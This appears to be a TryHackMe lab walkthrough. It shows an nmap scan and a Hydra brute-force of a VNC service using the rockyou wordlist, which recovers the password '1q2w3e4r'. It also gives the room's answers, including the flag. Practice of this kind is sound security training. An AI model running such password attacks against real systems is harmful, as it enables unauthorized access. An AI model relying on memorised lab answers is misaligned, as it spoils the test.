└─# nmap -sS 10.10.166.82            
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-06 06:23 EST
Nmap scan report for 10.10.166.82
Host is up (0.20s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 16.06 seconds
                                                                                                                    
┌──(root㉿kali)-[~]

└─# hydra  -P /usr/share/wordlists/rockyou.txt vnc://10.10.166.82
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-06 06:24:23
[WARNING] you should set the number of parallel task to 4 for vnc services.
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking vnc://10.10.166.82:5900/
[STATUS] 483.00 tries/min, 483 tries in 00:01h, 14343916 to do in 494:58h, 16 active
[5900][vnc] host: 10.10.166.82   password: 1q2w3e4r
[STATUS] attack finished for 10.10.166.82 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-06 06:26:43
                                                                                                                    
┌──(root㉿kali)-[~]
└─# 

Answer the questions below
Use Hydra to find the VNC password of the target with IP address 10.10.166.82. What is the password?
1q2w3e4r
Using a VNC client on the AttackBox, connect to the target of IP address 10.10.166.82. What is the flag written on the target’s screen?

THM{I_SEE_YOUR_SCREEN}
If you liked the topics presented in this task, check out these rooms next: Protocols and Servers 2, Hydra, Password Attacks, John the Ripper. 

No answer needed
